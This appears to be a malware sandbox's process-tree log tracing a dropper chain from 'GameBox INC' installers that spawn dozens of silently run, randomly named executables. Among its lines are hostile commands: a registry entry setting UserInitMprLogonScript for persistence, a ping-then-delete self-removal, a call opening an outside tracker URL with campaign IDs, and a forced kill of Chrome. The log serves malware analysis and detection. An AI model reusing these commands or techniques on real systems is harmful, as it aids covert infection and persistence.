                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                9⤵
                                                                  PID:5376
                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                    tapinstall.exe remove tap0901
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    • Checks SCSI registry key(s)
                                                                    PID:4044
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                  9⤵
                                                                    PID:7852
                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                      10⤵
                                                                        PID:8460
                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                      9⤵
                                                                        PID:9508
                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                        9⤵
                                                                          PID:7448
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            10⤵
                                                                              PID:7372
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                    5⤵
                                                                      PID:2344
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-6VM5P.tmp\Inlog.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-6VM5P.tmp\Inlog.tmp" /SL5="$10300,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:748
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MF69V.tmp\Setup.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MF69V.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4704
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-D9NB4.tmp\Setup.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-D9NB4.tmp\Setup.tmp" /SL5="$2025E,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-MF69V.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:6216
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-8EQ9M.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                              9⤵
                                                                                PID:6656
                                                                                • C:\Windows\SysWOW64\expand.exe
                                                                                  expand C:\Users\Admin\AppData\Local\Temp\is-8EQ9M.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                  10⤵
                                                                                  • Drops file in Windows directory
                                                                                  PID:1764
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                9⤵
                                                                                  PID:9708
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                    10⤵
                                                                                      PID:9836
                                                                                  • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                    "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                    9⤵
                                                                                      PID:5892
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                      9⤵
                                                                                        PID:9404
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-8EQ9M.tmp\{app}\vdi_compiler.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-8EQ9M.tmp\{app}\vdi_compiler"
                                                                                        9⤵
                                                                                          PID:9784
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-8EQ9M.tmp\{app}\vdi_compiler.exe"
                                                                                            10⤵
                                                                                              PID:9436
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping localhost -n 4
                                                                                                11⤵
                                                                                                • Runs ping.exe
                                                                                                PID:10012
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks whether UAC is enabled
                                                                                    • Drops file in Program Files directory
                                                                                    PID:4992
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                    5⤵
                                                                                      PID:4044
                                                                                      • C:\Users\Admin\AppData\Roaming\2928597.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\2928597.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5956
                                                                                      • C:\Users\Admin\AppData\Roaming\3487086.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\3487086.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                        PID:5592
                                                                                      • C:\Users\Admin\AppData\Roaming\3181739.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\3181739.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6064
                                                                                      • C:\Users\Admin\AppData\Roaming\3155323.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\3155323.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5144
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4132
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5964
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5152
                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmp10E4_tmp.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\tmp10E4_tmp.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6096
                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                          7⤵
                                                                                            PID:7080
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                            7⤵
                                                                                              PID:4720
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd
                                                                                                8⤵
                                                                                                  PID:5468
                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                    9⤵
                                                                                                      PID:7752
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                      Esplorarne.exe.com i
                                                                                                      9⤵
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:7192
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                        10⤵
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:8740
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                          11⤵
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:8988
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                            12⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:2344
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              13⤵
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:8976
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                14⤵
                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                PID:8756
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                  15⤵
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:7400
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                    16⤵
                                                                                                                      PID:8572
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                        17⤵
                                                                                                                          PID:8728
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                            18⤵
                                                                                                                              PID:7232
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                19⤵
                                                                                                                                  PID:9148
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                    20⤵
                                                                                                                                      PID:9664
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping RJMQBVDN -n 30
                                                                                                                9⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:8556
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks computer location settings
                                                                                                        PID:5216
                                                                                                        • C:\Users\Admin\Documents\_pUmdWhkAwJr7CR4PmKe6_gv.exe
                                                                                                          "C:\Users\Admin\Documents\_pUmdWhkAwJr7CR4PmKe6_gv.exe"
                                                                                                          6⤵
                                                                                                            PID:6620
                                                                                                          • C:\Users\Admin\Documents\zTwwisGngS1K6YFocL7woNz9.exe
                                                                                                            "C:\Users\Admin\Documents\zTwwisGngS1K6YFocL7woNz9.exe"
                                                                                                            6⤵
                                                                                                              PID:6716
                                                                                                              • C:\Users\Admin\Documents\zTwwisGngS1K6YFocL7woNz9.exe
                                                                                                                "C:\Users\Admin\Documents\zTwwisGngS1K6YFocL7woNz9.exe"
                                                                                                                7⤵
                                                                                                                  PID:8980
                                                                                                              • C:\Users\Admin\Documents\hW2hEtGXkr1leEgM4AyYsvwt.exe
                                                                                                                "C:\Users\Admin\Documents\hW2hEtGXkr1leEgM4AyYsvwt.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2680
                                                                                                              • C:\Users\Admin\Documents\Qx0RPxcpDdH5cusPmuPE1cbU.exe
                                                                                                                "C:\Users\Admin\Documents\Qx0RPxcpDdH5cusPmuPE1cbU.exe"
                                                                                                                6⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:5504
                                                                                                              • C:\Users\Admin\Documents\k77I6OyDUBebSnbY7lFRWLdd.exe
                                                                                                                "C:\Users\Admin\Documents\k77I6OyDUBebSnbY7lFRWLdd.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:2588
                                                                                                              • C:\Users\Admin\Documents\c1atC8xfVDKEinepOwkJd5si.exe
                                                                                                                "C:\Users\Admin\Documents\c1atC8xfVDKEinepOwkJd5si.exe"
                                                                                                                6⤵
                                                                                                                  PID:6896
                                                                                                                • C:\Users\Admin\Documents\JFM4tzeXVAJETlmX8Qc4KHP4.exe
                                                                                                                  "C:\Users\Admin\Documents\JFM4tzeXVAJETlmX8Qc4KHP4.exe"
                                                                                                                  6⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:6804
                                                                                                                  • C:\Users\Admin\Documents\JFM4tzeXVAJETlmX8Qc4KHP4.exe
                                                                                                                    C:\Users\Admin\Documents\JFM4tzeXVAJETlmX8Qc4KHP4.exe
                                                                                                                    7⤵
                                                                                                                      PID:6972
                                                                                                                    • C:\Users\Admin\Documents\JFM4tzeXVAJETlmX8Qc4KHP4.exe
                                                                                                                      C:\Users\Admin\Documents\JFM4tzeXVAJETlmX8Qc4KHP4.exe
                                                                                                                      7⤵
                                                                                                                        PID:7272
                                                                                                                    • C:\Users\Admin\Documents\vUVcu7eavu2OSCfOZFIR7BvT.exe
                                                                                                                      "C:\Users\Admin\Documents\vUVcu7eavu2OSCfOZFIR7BvT.exe"
                                                                                                                      6⤵
                                                                                                                        PID:6712
                                                                                                                      • C:\Users\Admin\Documents\dHKNVxJlubBqfYP7UCMt5un9.exe
                                                                                                                        "C:\Users\Admin\Documents\dHKNVxJlubBqfYP7UCMt5un9.exe"
                                                                                                                        6⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:6964
                                                                                                                      • C:\Users\Admin\Documents\dskOCENAuXFvOc1BUIDmuHC_.exe
                                                                                                                        "C:\Users\Admin\Documents\dskOCENAuXFvOc1BUIDmuHC_.exe"
                                                                                                                        6⤵
                                                                                                                          PID:7072
                                                                                                                          • C:\Users\Admin\Documents\dskOCENAuXFvOc1BUIDmuHC_.exe
                                                                                                                            "C:\Users\Admin\Documents\dskOCENAuXFvOc1BUIDmuHC_.exe" -q
                                                                                                                            7⤵
                                                                                                                              PID:7372
                                                                                                                          • C:\Users\Admin\Documents\uNoqJ8UIQuAilbug3Ftbr7R9.exe
                                                                                                                            "C:\Users\Admin\Documents\uNoqJ8UIQuAilbug3Ftbr7R9.exe"
                                                                                                                            6⤵
                                                                                                                              PID:6372
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 712
                                                                                                                                7⤵
                                                                                                                                • Program crash
                                                                                                                                PID:4960
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 684
                                                                                                                                7⤵
                                                                                                                                • Program crash
                                                                                                                                PID:4204
                                                                                                                            • C:\Users\Admin\Documents\sePo9J4VgWfVbn2AHfGB1D9F.exe
                                                                                                                              "C:\Users\Admin\Documents\sePo9J4VgWfVbn2AHfGB1D9F.exe"
                                                                                                                              6⤵
                                                                                                                                PID:7044
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1104
                                                                                                                                  7⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:8188
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1160
                                                                                                                                  7⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:5380
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 820
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Program crash
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:4436
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1200
                                                                                                                                  7⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:5288
                                                                                                                              • C:\Users\Admin\Documents\yNCtBkRflRQSEm3aGSTpJBos.exe
                                                                                                                                "C:\Users\Admin\Documents\yNCtBkRflRQSEm3aGSTpJBos.exe"
                                                                                                                                6⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:684
                                                                                                                              • C:\Users\Admin\Documents\275ET95dIFQUzAR5_H1QYcyo.exe
                                                                                                                                "C:\Users\Admin\Documents\275ET95dIFQUzAR5_H1QYcyo.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:6592
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5080063.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5080063.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:8140
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\7226445.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\7226445.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                      PID:8168
                                                                                                                                  • C:\Users\Admin\Documents\cThdys3reBxj5Itmx63JZIWL.exe
                                                                                                                                    "C:\Users\Admin\Documents\cThdys3reBxj5Itmx63JZIWL.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:7000
                                                                                                                                    • C:\Users\Admin\Documents\cThdys3reBxj5Itmx63JZIWL.exe
                                                                                                                                      C:\Users\Admin\Documents\cThdys3reBxj5Itmx63JZIWL.exe
                                                                                                                                      7⤵
                                                                                                                                        PID:7280
                                                                                                                                    • C:\Users\Admin\Documents\u8F2bbI15_98taVUFATFQa8k.exe
                                                                                                                                      "C:\Users\Admin\Documents\u8F2bbI15_98taVUFATFQa8k.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:7060
                                                                                                                                    • C:\Users\Admin\Documents\svERSTuF_4LfVhwt_G_9QFLu.exe
                                                                                                                                      "C:\Users\Admin\Documents\svERSTuF_4LfVhwt_G_9QFLu.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:7152
                                                                                                                                      • C:\Users\Admin\Documents\C4YDHuBSZAs08PA2NK1Hr5JA.exe
                                                                                                                                        "C:\Users\Admin\Documents\C4YDHuBSZAs08PA2NK1Hr5JA.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:7024
                                                                                                                                        • C:\Users\Admin\Documents\C4YDHuBSZAs08PA2NK1Hr5JA.exe
                                                                                                                                          C:\Users\Admin\Documents\C4YDHuBSZAs08PA2NK1Hr5JA.exe
                                                                                                                                          7⤵
                                                                                                                                            PID:7260
                                                                                                                                        • C:\Users\Admin\Documents\TQc8P1rLS7J1FXSOEHwn3VlP.exe
                                                                                                                                          "C:\Users\Admin\Documents\TQc8P1rLS7J1FXSOEHwn3VlP.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:6948
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-I506N.tmp\TQc8P1rLS7J1FXSOEHwn3VlP.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-I506N.tmp\TQc8P1rLS7J1FXSOEHwn3VlP.tmp" /SL5="$30264,138429,56832,C:\Users\Admin\Documents\TQc8P1rLS7J1FXSOEHwn3VlP.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:5768
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-1NIB7.tmp\Setup.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-1NIB7.tmp\Setup.exe" /Verysilent
                                                                                                                                                8⤵
                                                                                                                                                  PID:4960
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                    9⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                    PID:7828
                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274922 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                      10⤵
                                                                                                                                                        PID:8616
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5020
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4140
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                6⤵
                                                                                                                                                  PID:7876
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                    7⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:5512
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:1792
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                          2⤵
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:5724
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-I82GV.tmp\MediaBurner2.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-I82GV.tmp\MediaBurner2.tmp" /SL5="$10340,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:5228
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-Q2FRE.tmp\3377047_logo_media.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-Q2FRE.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                          2⤵
                                                                                                                                            PID:6044
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\GWNUNEOGGL\ultramediaburner.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\GWNUNEOGGL\ultramediaburner.exe" /VERYSILENT
                                                                                                                                              3⤵
                                                                                                                                                PID:7292
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-85I7H.tmp\ultramediaburner.tmp
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-85I7H.tmp\ultramediaburner.tmp" /SL5="$20368,281924,62464,C:\Users\Admin\AppData\Local\Temp\GWNUNEOGGL\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:3336
                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                    5⤵
                                                                                                                                                      PID:7720
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ff-bceeb-d5f-ea1a8-50b7c40c69a17\Mushulegyfo.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ff-bceeb-d5f-ea1a8-50b7c40c69a17\Mushulegyfo.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  PID:3000
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\17-ee02b-178-4e295-57f933690edd6\Gebaxaehele.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\17-ee02b-178-4e295-57f933690edd6\Gebaxaehele.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5824
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxzbjza3.02z\GcleanerEU.exe /eufive & exit
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3616
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\oxzbjza3.02z\GcleanerEU.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\oxzbjza3.02z\GcleanerEU.exe /eufive
                                                                                                                                                          5⤵
                                                                                                                                                            PID:8396
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v11ws5pe.aob\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                          4⤵
                                                                                                                                                            PID:860
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\v11ws5pe.aob\installer.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\v11ws5pe.aob\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:8520
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3e43h30c.m1e\ufgaa.exe & exit
                                                                                                                                                              4⤵
                                                                                                                                                                PID:6480
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m3pbk5kk.4ou\anyname.exe & exit
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:9084
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\m3pbk5kk.4ou\anyname.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\m3pbk5kk.4ou\anyname.exe
                                                                                                                                                                    5⤵
